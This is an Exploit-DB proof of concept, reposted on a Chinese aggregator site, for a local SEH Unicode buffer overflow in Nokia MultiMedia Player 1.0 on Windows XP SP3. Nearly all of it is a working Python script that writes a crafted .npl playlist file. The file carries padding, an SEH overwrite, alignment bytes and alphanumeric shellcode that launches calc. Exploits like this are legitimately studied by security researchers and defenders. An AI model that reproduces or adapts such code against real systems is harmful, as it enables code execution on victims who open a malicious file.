Nokia MultiMedia Player 1.0 – Local Overflow (SEH Unicode) - 体验盒子

作者： Carlos Mario Penagos Hollmann

日期： 2011-01-11

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/15975/

# Exploit Title: Nokia Multimedia playerSEH Unicode
# Date: January 11 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html
# Version: 1.00.55.5010
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8

 
#mail----> shogilord^gmail.com spams are welcome!!!!! 
#__________________ ____ __ _____ ________
# / ____/ / | |/ / ____/ | / / //_//_/ | / / ____/
#/ __/ / /| | / / __/ /|/ / ,< / //|/ / / __ 
# / /___/ /___| |/ / /___/ /|/ /| |_/ // /|/ /_/ / 
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
 
# COLOMBIA hacking presents.............
# 
# Dont be afraid of unicode my young padawan 
# 
# Big Thanks to sud0 !!
#

junk="\x44" * 2660

shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBdK8lPU4KjLS8o0mPO0LoQXc3QQPlpcdMa5YhnpVXgWRs920wkOXPA" #calc shellcode

nseh="\x61\xC5" 

align = "\x61\x6D\x61\x6D\x50\x6E\xC3" 


seh="\xEF\x42"

junk2="\xcc"*45

junk3="\xcc"*850

buff=junk+nseh+seh+align+junk2+shellcode+junk3

magic = open("Crash1234.npl","w")

magic.write(buff)

magic.close()